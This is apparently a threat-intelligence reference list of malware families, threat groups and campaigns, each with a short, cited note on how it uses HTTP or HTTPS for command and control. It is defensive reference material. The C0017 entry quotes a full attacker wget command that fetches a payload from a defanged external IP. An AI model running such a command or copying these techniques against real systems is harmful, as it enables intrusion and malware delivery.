C0028 2015 Ukraine Electric Power Attack

During the 2015 Ukraine Electric Power Attack, Sandworm Team used BlackEnergy to communicate between compromised hosts and their command-and-control servers via HTTP post requests. [3]

S0066 3PARA RAT

3PARA RAT uses HTTP for command and control.[1]

S0065 4H RAT

4H RAT uses HTTP for command and control.[1]

S0469 ABK

ABK has the ability to use HTTP in communications with C2.[4]

S1028 Action RAT

Action RAT can use HTTP to communicate with C2 servers.[5]

S0045 ADVSTORESHELL

ADVSTORESHELL connects to port 80 of a C2 server using Wininet API. Data is exchanged via HTTP POSTs.[6]

S0331 Agent Tesla

Agent Tesla has used HTTP for C2 communications.[7][8]

S1025 Amadey

Amadey has used HTTP for C2 communications.[9]

S0504 Anchor

Anchor has used HTTP and HTTPS in C2 communications.[10]

S1074 ANDROMEDA

ANDROMEDA has the ability to make GET requests to download files from C2.[11]

S0584 AppleJeus

AppleJeus has sent data to its C2 server via POST requests.[12][13]

S0622 AppleSeed

AppleSeed has the ability to communicate with C2 over HTTP.[14][15]

G0026 APT18

APT18 uses HTTP for C2 communications.[16]

G0073 APT19

APT19 used HTTP for C2 communications. APT19 also used an HTTP malware variant to communicate over HTTP for C2.[17][18]

G0007 APT28

Later implants used by APT28, such as CHOPSTICK, use a blend of HTTP, HTTPS, and other legitimate channels for C2, depending on module configuration.[19][20]

G0050 APT32

APT32 has used JavaScript that communicates over HTTP or HTTPS to attacker controlled domains to download additional frameworks. The group has also used downloaded encrypted payloads over HTTP.[21][22]

G0064 APT33

APT33 has used HTTP for command and control.[23]

G0067 APT37

APT37 uses HTTPS to conceal C2 communications.[24]

G0082 APT38

APT38 used a backdoor, QUICKRIDE, to communicate to the C2 server over HTTP and HTTPS.[25]

G0087 APT39

APT39 has used HTTP in communications with C2.[26][27]

G0096 APT41

APT41 used HTTP to download payloads for CVE-2019-19781 and CVE-2020-10189 exploits.[28]

C0040 APT41 DUST

APT41 DUST used HTTPS for command and control.[29]

S0456 Aria-body

Aria-body has used HTTP in C2 communications.[30]

S1029 AuTo Stealer

AuTo Stealer can use HTTP to communicate with its C2 servers.[5]

S0473 Avenger

Avenger has the ability to use HTTP in communication with C2.[4]

S0475 BackConfig

BackConfig has the ability to use HTTPS for C2 communiations.[31]

S0031 BACKSPACE

BACKSPACE uses HTTP as a transport to communicate with its command server.[32]

S1081 BADHATCH

BADHATCH can use HTTP and HTTPS over port 443 to communicate with actor-controlled C2 servers.[33][34]

S0128 BADNEWS

BADNEWS establishes a backdoor over HTTP.[35]

S0337 BadPatch

BadPatch uses HTTP for C2.[36]

S0239 Bankshot

Bankshot uses HTTP for command and control communication.[37]

S0534 Bazar

Bazar can use HTTP and HTTPS over ports 80 and 443 in C2 communications.[38][39][40]

S0470 BBK

BBK has the ability to use HTTP in communications with C2.[4]

S0127 BBSRAT

BBSRAT uses GET and POST requests over HTTP or HTTPS for command and control to obtain commands and send ZLIB compressed data back to the C2 server.[41]

S0268 Bisonal

Bisonal has used HTTP for C2 communications.[42][43]

G1002 BITTER

BITTER has used HTTP POST requests for C2.[44][45]

S0089 BlackEnergy

BlackEnergy communicates with its C2 server over HTTP.[46]

S0564 BlackMould

BlackMould can send commands to C2 in the body of HTTP POST requests.[47]

S0520 BLINDINGCAN

BLINDINGCAN has used HTTPS over port 443 for command and control.[48]

S0657 BLUELIGHT

BLUELIGHT can use HTTP/S for C2 using the Microsoft Graph API.[49]

S0635 BoomBox

BoomBox has used HTTP POST requests for C2.[50]

G0060 BRONZE BUTLER

BRONZE BUTLER malware has used HTTP for C2.[51]

S1063 Brute Ratel C4

Brute Ratel C4 can use HTTPS and HTTPS for C2 communication.[52][53]

S0043 BUBBLEWRAP

BUBBLEWRAP can communicate using HTTP or HTTPS.[54]

S0482 Bundlore

Bundlore uses HTTP requests for C2.[55]

C0017 C0017

During C0017, APT41 ran wget http://103.224.80[.]44:8080/kernel to download malicious payloads.[56]

C0018 C0018

During C0018, the threat actors used HTTP for C2 communications.[57]

C0021 C0021

During C0021, the threat actors used HTTP for some of their C2 communications.[58]

S0030 Carbanak

The Carbanak malware communicates to its command server using HTTP with an encrypted payload.[59]

S0484 Carberp

Carberp has connected to C2 servers via HTTP.[60]

S0335 Carbon

Carbon can use HTTP in C2 communications.[61]

S0348 Cardinal RAT

Cardinal RAT is downloaded using HTTP over port 443.[62]

S0631 Chaes

Chaes has used HTTP for C2 communications.[63]

S0674 CharmPower

CharmPower can use HTTP to communicate with C2.[64]

S0144 ChChes

ChChes communicates to its C2 server over HTTP and embeds data within the Cookie HTTP header.[65][66]

G0114 Chimera

Chimera has used HTTPS for C2 communications.[67]

S1149 CHIMNEYSWEEP

CHIMNEYSWEEP can send HTTP GET requests to  C2.[68]

S0020 China Chopper

China Chopper's server component executes code sent via HTTP POST commands.[69]

S0023 CHOPSTICK

Various implementations of CHOPSTICK communicate with C2 over HTTP.[70]

S0660 Clambling

Clambling has the ability to communicate over HTTP.[71]

S0054 CloudDuke

One variant of CloudDuke uses HTTP and HTTPS for C2.[72]

S1105 COATHANGER

COATHANGER uses an HTTP GET request to initialize a follow-on TLS tunnel for command and control.[73]

G0080 Cobalt Group

Cobalt Group has used HTTPS for C2.[74][75][76]

S0154 Cobalt Strike

Cobalt Strike can use a custom command and control protocol that can be encapsulated in HTTP or HTTPS. All protocols use their standard assigned ports.[77][78][79][80][81]

S0244 Comnie

Comnie uses HTTP for C2 communication.[82]

S0126 ComRAT

ComRAT has used HTTP requests for command and control.[83][84][85]

G0142 Confucius

Confucius has used HTTP for C2 communications.[86]

S0137 CORESHELL

CORESHELL can communicate over HTTP for C2.[19][87]

S0050 CosmicDuke

CosmicDuke can use HTTP or HTTPS for command and control to hard-coded C2 servers.[72][88]

S1155 Covenant

Covenant can establish command and control via HTTP.[89]

S0046 CozyCar

CozyCar's main method of communicating with its C2 servers is using HTTP or HTTPS.[90]

S1023 CreepyDrive

CreepyDrive can use HTTPS for C2 using the Microsoft Graph API.[91]

S1024 CreepySnail

CreepySnail can use HTTP for C2.[91]

S0115 Crimson

Crimson can use a HTTP GET request to download its final payload.[92]

S0538 Crutch

Crutch has conducted C2 communications with a Dropbox account using the HTTP API.[93]

S0527 CSPY Downloader

CSPY Downloader can use GET requests to download additional payloads from C2.[94]

S1153 Cuckoo Stealer

Cuckoo Stealer can use the curl API for C2 communications.[95]

S0687 Cyclops Blink

Cyclops Blink can download files via HTTP and HTTPS.[96][97]

S0497 Dacls

Dacls can use HTTPS in C2 communications.[98][99]

G1034 Daggerfly

Daggerfly uses HTTP for command and control communication.[100]

S1014 DanBot

DanBot can use HTTP in C2 communication.[101]

G0070 Dark Caracal

Dark Caracal's version of Bandook communicates with their server over a TCP port using HTTP payloads Base64 encoded and suffixed with the string "&&&".[102]

S0334 DarkComet

DarkComet can use HTTP for C2 communications.[103]

S1066 DarkTortilla

DarkTortilla has used HTTP and HTTPS for C2.[104]

S0673 DarkWatchman

DarkWatchman uses HTTPS for command and control.[105]

S0187 Daserf

Daserf uses HTTP for C2.[51]

S0243 DealersChoice

DealersChoice uses HTTP for communication with the C2 server.[106]

S0616 DEATHRANSOM

DEATHRANSOM can use HTTPS to download files.[107]

S0659 Diavol

Diavol has used HTTP GET and POST requests for C2.[108]

S0200 Dipsind

Dipsind uses HTTP for C2.[109]

S0600 Doki

Doki has communicated with C2 over HTTPS.[110]

S0695 Donut

Donut can use HTTP to download previously staged shellcode payloads.[111]

S0472 down_new

down_new has the ability to use HTTP in C2 communications.[4]

S0186 DownPaper

DownPaper communicates to its C2 server over HTTP.[112]

S0694 DRATzarus

DRATzarus can use HTTP or HTTPS for C2 communications.[113]

S0384 Dridex

Dridex has used POST requests and HTTPS for C2 communications.[114][115]

S0502 Drovorub

Drovorub can use the WebSocket protocol and has initiated communication with C2 servers with an HTTP Upgrade request.[116]

S0062 DustySky

DustySky has used both HTTP and HTTPS for C2.[117]

S0024 Dyre

Dyre uses HTTPS for C2 communications.[118][119]

S0554 Egregor

Egregor has communicated with its C2 servers via HTTPS protocol.[120]

S0081 Elise

Elise communicates over HTTP or HTTPS for C2.[121]

S0064 ELMER

ELMER uses HTTP for command and control.[122]

S0082 Emissary

Emissary uses HTTP or HTTPS for C2.[123]

S0367 Emotet

Emotet has used HTTP for command and control.[124]

S0363 Empire

Empire can conduct command and control over protocols like HTTP and HTTPS.[125]

S0091 Epic

Epic uses HTTP and HTTPS for C2 communications.[126][127]

S0396 EvilBunny

EvilBunny has executed C2 commands directly via HTTP.[128]

S0401 Exaramel for Linux

Exaramel for Linux uses HTTPS for C2 communications.[129][130]

S0569 Explosive

Explosive has used HTTP for communication.[131]

S0512 FatDuke

FatDuke can be controlled via a custom C2 protocol over HTTP.[132]

S0171 Felismus

Felismus uses HTTP for C2.[133]

S0267 FELIXROOT

FELIXROOT uses HTTP and HTTPS to communicate with the C2 server.[134][135]

G1016 FIN13

FIN13 has used HTTP requests to chain multiple web shells and to contact actor-controlled C2 servers prior to exfiltrating stolen data.[136][137]

G0085 FIN4

FIN4 has used HTTP POST requests to transmit data.[138][139]

G0061 FIN8

FIN8 has used HTTPS for command and control.[140]

S0355 Final1stspy

Final1stspy uses HTTP for C2.[141]

S0696 Flagpro

Flagpro can communicate with its C2 using HTTP.[142]

S0381 FlawedAmmyy

FlawedAmmyy has used HTTP for C2.[143]

S0661 FoggyWeb

FoggyWeb has the ability to communicate with C2 servers over HTTP GET/POST requests.[144]

S1120 FRAMESTING

FRAMESTING can retrieve C2 commands from values stored in the DSID cookie from the current HTTP request or from decompressed zlib data within the request's POST data.[145]

C0001 Frankenstein

During Frankenstein, the threat actors used HTTP GET requests for C2.[146]

S1144 FRP

FRP has the ability to use HTTP and HTTPS to enable the forwarding of requests for internal services via domain name.[147]

G0047 Gamaredon Group

Gamaredon Group has used HTTP and HTTPS for C2 communications.[148][149][150][151][152][153][154]

S0168 Gazer

Gazer communicates with its C2 servers over HTTP.[155]

S0666 Gelsemium

Gelsemium can use HTTP/S in C2 communications.[156]

S0049 GeminiDuke

GeminiDuke uses HTTP and HTTPS for command and control.[72]

S0460 Get2

Get2 has the ability to use HTTP to send information collected from an infected host to C2.[157]

S0249 Gold Dragon

Gold Dragon uses HTTP for communication to the control servers.[158]

S0493 GoldenSpy

GoldenSpy has used the Ryeol HTTP Client to facilitate HTTP internet communication.[159]

S0597 GoldFinder

GoldFinder has used HTTP for C2.[160]

S0588 GoldMax

GoldMax has used HTTPS and HTTP GET requests with custom HTTP cookies for C2.[160][161]

S0477 Goopy

Goopy has the ability to communicate with its C2 over HTTP.[22]

S0531 Grandoreiro

Grandoreiro has the ability to use HTTP in C2 communications.[162][163]

S0237 GravityRAT

GravityRAT uses HTTP for C2.[164]

S0342 GreyEnergy

GreyEnergy uses HTTP and HTTPS for C2 communications.[135]

S0632 GrimAgent

GrimAgent has the ability to use HTTP for C2 communications.[165]

S0561 GuLoader

GuLoader can use HTTP to retrieve additional binaries.[166][167]

G0125 HAFNIUM

HAFNIUM has used open-source C2 frameworks, including Covenant.[168]

S0037 HAMMERTOSS

The "Uploader" variant of HAMMERTOSS visits a hard-coded server over HTTP/S to download the images HAMMERTOSS uses to receive commands.[169]

S0391 HAWKBALL

HAWKBALL has used HTTP to communicate with a single hard-coded C2 server.[170]

S0170 Helminth

Helminth can use HTTP for C2.[171]

S0087 Hi-Zor

Hi-Zor communicates with its C2 server over HTTPS.[172]

G0126 Higaisa

Higaisa used HTTP and HTTPS to send data back to its C2 server.[173][174]

S0009 Hikit

Hikit has used HTTP for C2.[175]

S0070 HTTPBrowser

HTTPBrowser has used HTTP and HTTPS for command and control.[176][177]

S0068 httpclient

httpclient uses HTTP for command and control.[1]

S0398 HyperBro

HyperBro has used HTTPS for C2 communications.[178]

S1022 IceApple

IceApple can use HTTP GET to request and pull information from C2.[179]

S0483 IcedID

IcedID has used HTTPS in communications with C2.[180][181][182]

G0100 Inception

Inception has used HTTP, HTTPS, and WebDav in network communications.[183][184]

S0604 Industroyer

Industroyer’s main backdoor connected to a remote C2 server using HTTPS.[185]

S0260 InvisiMole

InvisiMole uses HTTP for C2 communications.[186]

S1132 IPsec Helper

IPsec Helper connects to command and control servers via HTTP POST requests based on parameters hard-coded into the malware.[187]

S0015 Ixeshe

Ixeshe uses HTTP for command and control.[188][189]

S0044 JHUHUGIT

JHUHUGIT variants have communicated with C2 servers over HTTP and HTTPS.[190][191][192]

S0265 Kazuar

Kazuar uses HTTP and HTTPS to communicate with the C2 server. Kazuar can also act as a webserver and listen for inbound HTTP requests through an exposed API.[193]

G0004 Ke3chang

Ke3chang malware including RoyalCli and BS2005 have communicated over HTTP with the C2 server through Internet Explorer (IE) by using the COM interface IWebBrowser2.[194][195]

S1020 Kevin

Variants of Kevin can communicate with C2 over HTTP.[196]

S0276 Keydnap

Keydnap uses HTTPS for command and control.[197]

S1051 KEYPLUG

KEYPLUG has the ability to communicate over HTTP and WebSocket Protocol (WSS) for C2.[56]

S0526 KGH_SPY

KGH_SPY can send data to C2 with HTTP POST requests.[94]

G0094 Kimsuky

Kimsuky has used HTTP GET and POST requests for C2.[198]

S0599 Kinsing

Kinsing has communicated with C2 over HTTP.[199]

S0250 Koadic

Koadic has used HTTP for C2 communications.[200]

S0162 Komplex

The Komplex C2 channel uses HTTP POST requests.[201]

S0356 KONNI

KONNI has used HTTP POST for C2.[202][203]

S1075 KOPILUWAK

KOPILUWAK has used HTTP POST requests to send data to C2.[11]

S1160 Latrodectus

Latrodectus can send registration information to C2 via HTTP POST.[204][205][206]

G0032 Lazarus Group

Lazarus Group has conducted C2 over HTTP and HTTPS.[207][98][99][208][209][210]

S1119 LIGHTWIRE

LIGHTWIRE can use HTTP for C2 communications.[145]

S0513 LiteDuke

LiteDuke can use HTTP GET requests in C2 communications.[132]

S0680 LitePower

LitePower can use HTTP and HTTPS for C2 communications.[211]

S0447 Lokibot

Lokibot has used HTTP for C2 communications.[212][213]

S0582 LookBack

LookBack’s C2 proxy tool sends data to a C2 server over HTTP.[214]

S0042 LOWBALL

LOWBALL command and control occurs via HTTPS over port 443.[54]

G1014 LuminousMoth

LuminousMoth has used HTTP for C2.[215]

S1141 LunarWeb

LunarWeb can use POST to send victim identification to C2 and GET to retrieve commands.[216]

S0409 Machete

Machete uses HTTP for Command & Control.[217][218][219]

S0282 MacSpy

MacSpy uses HTTP for command and control.[220]

S1060 Mafalda

Mafalda can use HTTP for C2.[221]

G0059 Magic Hound

Magic Hound has used HTTP for C2.[222][223][224]

S1156 Manjusaka

Manjusaka has used HTTP for command and control communication.[225]

S0652 MarkiRAT

MarkiRAT can initiate communication over HTTP/HTTPS for its C2 server.[226]

S0449 Maze

Maze has communicated to hard-coded IP addresses via HTTP.[227]

S0500 MCMD

MCMD can use HTTPS in communication with C2 web servers.[228]

S0459 MechaFlounder

MechaFlounder has the ability to use HTTP in communication with C2.[229]

G1013 Metador

Metador has used HTTP for C2.[221]

S1059 metaMain

metaMain can use HTTP for C2 communications.[221][230]

S0455 Metamorfo

Metamorfo has used HTTP for C2.[231][232]

S0339 Micropsia

Micropsia uses HTTP and HTTPS for C2 network communications.[233][234]

S1015 Milan

Milan can use HTTPS for communication with C2.[235][196][236]

S0051 MiniDuke

MiniDuke uses HTTP and HTTPS for command and control.[72][132]

S0084 Mis-Type

Mis-Type network traffic can communicate over HTTP.[237]

S1026 Mongall

Mongall can use HTTP for C2 communication.[238]

G1036 Moonstone Sleet

Moonstone Sleet used curl to connect to adversary-controlled infrastructure and retrieve additional payloads.[239]

S0284 More_eggs

More_eggs uses HTTPS for C2.[74][240]

S1047 Mori

Mori can communicate using HTTP over IPv4 or IPv6 depending on a flag set.[241]

G0069 MuddyWater

MuddyWater has used HTTP for C2 communications.[242][243]

G0129 Mustang Panda

Mustang Panda has communicated with its C2 via HTTP POST requests.[244][245][246][247]

S0699 Mythic

Mythic supports HTTP-based C2 profiles.[248]

S0691 Neoichor

Neoichor can use HTTP for C2 communications.[195]

S0034 NETEAGLE

NETEAGLE will attempt to detect if the infected host is configured to a proxy. If so, NETEAGLE will send beacons via an HTTP POST request. NETEAGLE will also use HTTP to download resources that contain an IP address and Port Number pair to connect to for further C2.[32]

S0198 NETWIRE

NETWIRE has the ability to communicate over HTTP.[249][250]

S1106 NGLite

NGLite will initially beacon out to the NKN network via an HTTP POST over TCP 30003.[251]

C0002 Night Dragon

During Night Dragon, threat actors used HTTP for C2.[252]

S1100 Ninja

Ninja can use HTTP for C2 communications.[253]

S0385 njRAT

njRAT has used HTTP for C2 communications.[254]

S0353 NOKKI

NOKKI has used HTTP for C2 communications.[255]

S0340 Octopus

Octopus has used HTTP GET and POST requests for C2 communications.[256][257]

G0049 OilRig

OilRig has used HTTP for C2.[258][259][260]

S0439 Okrum

Okrum uses HTTP for communication with its C2.[261]

S0138 OLDBAIT

OLDBAIT can use HTTP for C2.[19]

S0052 OnionDuke

OnionDuke uses HTTP and HTTPS for C2.[72]

S0264 OopsIE

OopsIE uses HTTP for C2 communications.[262][263]

C0012 Operation CuckooBees

During Operation CuckooBees, the threat actors enabled HTTP and HTTPS listeners.[264]

C0022 Operation Dream Job

During Operation Dream Job, Lazarus Group uses HTTP and HTTPS to contact actor-controlled C2 servers.[265]

C0014 Operation Wocao

During Operation Wocao, threat actors’ XServer tool communicated using HTTP and HTTPS.[266]

G0071 Orangeworm

Orangeworm has used HTTP for C2.[267]

S0352 OSX_OCEANLOTUS.D

OSX_OCEANLOTUS.D can also use use HTTP POST and GET requests to send and receive C2 information.[268]

S0594 Out1

Out1 can use HTTP and HTTPS in communications with remote hosts.[243]

S1017 OutSteel

OutSteel has used HTTP for C2 communications.[269]

S0072 OwaAuth

OwaAuth uses incoming HTTP requests with a username keyword and commands and handles them as instructions to perform actions.[176]

S0598 P.A.S. Webshell

P.A.S. Webshell can issue commands via HTTP POST.[130]

S0664 Pandora

Pandora can communicate over HTTP.[270]

S1050 PcShare

PcShare has used HTTP for C2 communication.[271]

S0643 Peppy

Peppy can use HTTP to communicate with C2.[92]

S0048 PinchDuke

PinchDuke transfers files from the compromised host via HTTP or HTTPS to a C2 server.[72]

S1031 PingPull

A PingPull variant can communicate with its C2 servers by using HTTPS.[272]

S0435 PLEAD

PLEAD has used HTTP for communications with command and control (C2) servers.[273][274]

S0013 PlugX

PlugX can be configured to use HTTP for command and control.[176][275]

S0067 pngdowner

pngdowner uses HTTP for command and control.[1]

S0428 PoetRAT

PoetRAT has used HTTP and HTTPs for C2 communications.[276]

S0518 PolyglotDuke

PolyglotDuke has has used HTTP GET requests in C2 communications.[132]

S0453 Pony

Pony has sent collected information to the C2 via HTTP POST request.[277]

S0378 PoshC2

PoshC2 can use protocols like HTTP/HTTPS for command and control traffic.[278]

S0441 PowerShower

PowerShower has sent HTTP GET and POST requests to C2 servers to send information and receive instructions.[184]

S0371 POWERTON

POWERTON has used HTTP/HTTPS for C2 traffic.[279]

S1046 PowGoop

PowGoop can send HTTP GET requests to malicious servers.[280]

S0184 POWRUNER

POWRUNER can use HTTP for C2 communications.[281][259]

S0238 Proxysvc

Proxysvc uses HTTP over SSL to communicate commands with the control server.[282]

S0078 Psylo

Psylo uses HTTPS for C2.[283]

S0147 Pteranodon

Pteranodon can use HTTP for C2.[148]

S1108 PULSECHECK

PULSECHECK can check HTTP request headers for a specific backdoor key and if found will output the result of the command in the variable HTTP_X_CMD.[284]

S0196 PUNCHBUGGY

PUNCHBUGGY enables remote interaction and can obtain additional code over HTTPS GET and POST requests.[285][286][287]

S0192 Pupy

Pupy can communicate over HTTP for C2.[288]

S0650 QakBot

QakBot has the ability to use HTTP and HTTPS in communication with C2 servers.[289][290][291]

S0269 QUADAGENT

QUADAGENT uses HTTPS and HTTP for C2 communications.[292]

S1076 QUIETCANARY

QUIETCANARY can use HTTPS for C2 communications.[11]

S0686 QuietSieve

QuietSieve can use HTTPS in C2 communications.[293]

S1148 Raccoon Stealer

Raccoon Stealer uses HTTP, and particularly HTTP POST requests, for command and control actions.[294][295][296]

S0629 RainyDay

RainyDay can use HTTP in C2 communications.[297]

S0458 Ramsay

Ramsay has used HTTP for C2.[298]

G0075 Rancor

Rancor has used HTTP for C2.[299]

S1130 Raspberry Robin

Raspberry Robin uses outbound HTTP requests containing victim information for retrieving second stage payloads.[300] Variants of Raspberry Robin can download archive files (such as 7-Zip files) via the victim web browser for second stage execution.[301]

S0241 RATANKBA

RATANKBA uses HTTP/HTTPS for command and control communication.[302][303]

S0662 RCSession

RCSession can use HTTP in C2 communications.[71][304]

S0495 RDAT

RDAT can use HTTP communications for C2, as well as using the WinHTTP library to make requests to the Exchange Web Services API.[305]

S0172 Reaver

Some Reaver variants use HTTP for C2.[306]

G1039 RedCurl

RedCurl has used HTTP, HTTPS and Webdav protocls for C2 communications.[307][308]

S0153 RedLeaves

RedLeaves can communicate to its C2 over HTTP and HTTPS if directed.[309][310]

S0019 Regin

The Regin malware platform supports many standard protocols, including HTTP and HTTPS.[311]

S0375 Remexi

Remexi uses BITSAdmin to communicate with the C2 server over HTTP.[312]

S0125 Remsec

Remsec is capable of using HTTP and HTTPS for C2.[313][314][315]

S0496 REvil

REvil has used HTTP and HTTPS in communication with C2.[316][317][318][319][320]

S0258 RGDoor

RGDoor uses HTTP for C2 communications.[321]

S0003 RIPTIDE

APT12 has used RIPTIDE, a RAT that uses HTTP to communicate.[322]

S0448 Rising Sun

Rising Sun has used HTTP and HTTPS for command and control.[323]

G0106 Rocke

Rocke has executed wget and curl commands to Pastebin over the HTTPS protocol.[324]

S0240 ROKRAT

ROKRAT can use HTTP and HTTPS for command and control communication.[325][326][327]

S0148 RTM

RTM has initiated connections to external domains using HTTPS.[328]

S0085 S-Type

S-Type uses HTTP for C2.[237]

S1018 Saint Bot

Saint Bot has used HTTP for C2 communications.[329]

S0074 Sakula

Sakula uses HTTP for C2.[330]

S1099 Samurai

Samurai can use a .NET HTTPListener class to receive and handle HTTP POST requests.[253]

G0034 Sandworm Team

Sandworm Team's BCS-server tool connects to the designated C2 server via HTTP.[331]

S0053 SeaDuke

SeaDuke uses HTTP and HTTPS for C2.[72]

S0345 Seasalt

Seasalt uses HTTP for C2 communications.[332]

S0382 ServHelper

ServHelper uses HTTP for C2.[333]

S0596 ShadowPad

ShadowPad communicates over HTTP to retrieve a string that is decoded into a C2 server URL.[334]

S0140 Shamoon

Shamoon has used HTTP for C2.[335]

S1019 Shark

Shark has the ability to use HTTP in C2 communications.[235][236]

S0444 ShimRat

ShimRat communicated over HTTP and HTTPS with C2 servers.[336]

S0445 ShimRatReporter

ShimRatReporter communicated over HTTP with preconfigured C2 servers.[336]

S0589 Sibot

Sibot communicated with its C2 server via HTTP GET requests.[160]

S0610 SideTwist

SideTwist has used HTTP GET and POST requests over port 443 for C2.[337]

G0121 Sidewinder

Sidewinder has used HTTP in C2 communications.[338][339][340]

G0083 SilverTerrier

SilverTerrier uses HTTP for C2 communications.[341]

S1110 SLIGHTPULSE

SLIGHTPULSE has the ability to process HTTP GET requests as a normal web server and to insert logic that will read or write files or execute commands in response to HTTP POST requests.[284]

S0633 Sliver

Sliver has the ability to support C2 communications over HTTP/S.[342][343][344]

S0533 SLOTHFULMEDIA

SLOTHFULMEDIA has used HTTP and HTTPS for C2 communications.[345]

S1035 Small Sieve

Small Sieve can contact actor-controlled C2 servers by using the Telegram API over HTTPS.[241]

S0226 Smoke Loader

Smoke Loader uses HTTP for C2.[346]

S0649 SMOKEDHAM

SMOKEDHAM has communicated with its C2 servers via HTTPS and HTTP POST requests.[347]

S0159 SNUGRIDE

SNUGRIDE communicates with its C2 server over HTTP.[309]

C0024 SolarWinds Compromise

During the SolarWinds Compromise, APT29 used HTTP for C2 and data exfiltration.[348]

S0516 SoreFang

SoreFang can use HTTP in C2 communications.[349][350]

S0543 Spark

Spark has used HTTP POST requests to communicate with its C2 server to receive commands.[351]

S0374 SpeakUp

SpeakUp uses POST and GET requests over HTTP to communicate with its main C&C server. [352]

S1030 Squirrelwaffle

Squirrelwaffle has used HTTP POST requests for C2 communications.[353]

S1037 STARWHALE

STARWHALE has the ability to contact actor-controlled C2 servers via HTTP.[354][241]

S1112 STEADYPULSE

STEADYPULSE can parse web requests made to a targeted server to determine the next stage of execution.[284]

G0038 Stealth Falcon

Stealth Falcon malware communicates with its C2 server via HTTPS.[355]

S0491 StrongPity

StrongPity can use HTTP and HTTPS in C2 communications.[356][357]

S0603 Stuxnet

Stuxnet uses HTTP to communicate with a command and control server. [358]

S1042 SUGARDUMP

A SUGARDUMP variant has used HTTP for C2.[359]

S0559 SUNBURST

SUNBURST communicated via HTTP GET or HTTP POST requests to third party servers for C2.[360]

S0578 SUPERNOVA

SUPERNOVA had to receive an HTTP GET request containing a specific set of parameters in order to execute.[361][362]

S1064 SVCReady

SVCReady can communicate with its C2 servers via HTTP.[363]

S0060 Sys10

Sys10 uses HTTP for C2.[364]

G0092 TA505

TA505 has used HTTP to communicate with C2 nodes.[365]

G0127 TA551

TA551 has used HTTP for C2 communications.[366]

S0011 Taidoor

Taidoor has used HTTP GET and POST requests for C2.[367]

G0139 TeamTNT

TeamTNT has the curl command to send credentials over HTTP and the curl and wget commands to download new software.[368][369][370] TeamTNT has also used a custom user agent HTTP header in shell scripts.[371]

S0595 ThiefQuest

ThiefQuest uploads files via unencrypted HTTP. [372][373]

G0027 Threat Group-3390

Threat Group-3390 malware has used HTTP for C2.[374]

S0668 TinyTurla

TinyTurla can use HTTPS in C2 communications.[375]

S0671 Tomiris

Tomiris can use HTTP to establish C2 communications.[376]

S0678 Torisma

Torisma can use HTTP and HTTPS for C2 communications.[377]

S0682 TrailBlazer

TrailBlazer has used HTTP requests for C2.[378]

S0266 TrickBot

TrickBot uses HTTPS to communicate with its C2 servers, to get malware updates, modules that perform most of the malware logic and various configuration files.[379][10]

S0094 Trojan.Karagany

Trojan.Karagany can communicate with C2 via HTTP POST requests.[380]

G0081 Tropic Trooper

Tropic Trooper has used HTTP in communication with the C2.[381][382]

S0436 TSCookie

TSCookie can multiple protocols including HTTP and HTTPS in communication with command and control (C2) servers.[383][384]

S0647 Turian

Turian has the ability to use HTTP for its C2.[385]

G0010 Turla

Turla has used HTTP and HTTPS for C2 communications.[386][387]

S0333 UBoatRAT

UBoatRAT has used HTTP for C2 communications.[388]

S0275 UPPERCUT

UPPERCUT has used HTTP for C2, including sending error codes in Cookie headers.[389]

S0022 Uroburos

Uroburos can use a custom HTTP-based protocol for large data communications that can blend with normal network traffic by riding on top of standard HTTP.[390]

S0386 Ursnif

Ursnif has used HTTPS for C2.[391][392][393]

S0476 Valak

Valak has used HTTP in communications with C2.[394][366]

S0636 VaporRage

VaporRage can use HTTP to download shellcode from compromised websites.[50]

S0207 Vasport

Vasport creates a backdoor by making a connection using a HTTP POST.[395]

S0442 VBShower

VBShower has attempted to obtain a VBS script from command and control (C2) nodes over HTTP.[396]

S0257 VERMIN

VERMIN uses HTTP for C2 communications.[397]

C0039 Versa Director Zero Day Exploitation

Versa Director Zero Day Exploitation established HTTPS communications from adversary-controlled SOHO devices over port 443 with compromised Versa Director servers.[398]

S0514 WellMess

WellMess can use HTTP and HTTPS in C2 communications.[399][400][401][350]

S0689 WhisperGate

WhisperGate can make an HTTPS connection to download additional files.[402][403]

G0112 Windshift

Windshift has used tools that communicate with C2 over HTTP.[404]

S0466 WindTail

WindTail has the ability to use HTTP for C2 communications.[405]

S0059 WinMM

WinMM uses HTTP for C2.[364]

S0430 Winnti for Linux

Winnti for Linux has used HTTP in outbound communications.[406]

S0141 Winnti for Windows

Winnti for Windows has the ability to use encapsulated HTTP/S in C2 communications.[407]

G1035 Winter Vivern

Winter Vivern uses HTTP and HTTPS protocols for exfiltration and command and control activity.[408][409]

S1115 WIREFIRE

WIREFIRE can respond to specific HTTP POST requests to /api/v1/cav/client/visits.[410][411]

G0090 WIRTE

WIRTE has used HTTP for network communication.[412]

G0102 Wizard Spider

Wizard Spider has used HTTP for network communications.[413]

S1065 Woody RAT

Woody RAT can communicate with its C2 server using HTTP requests.[414]

S0341 Xbash

Xbash uses HTTP for C2 communications.[415]

S0653 xCaon

xCaon has communicated with the C2 server by sending POST requests over HTTP.[416]

S0388 YAHOYAH

YAHOYAH uses HTTP for C2.[417]

S0251 Zebrocy

Zebrocy uses HTTP for C2.[418][419][420][421][422][423]

S0230 ZeroT

ZeroT has used HTTP for C2.[424][425]

S0330 Zeus Panda

Zeus Panda uses HTTP for C2 communications.[426]

S0086 ZLib

ZLib communicates over HTTP for C2.[237]

S0412 ZxShell

ZxShell has used HTTP for C2 connections.[427]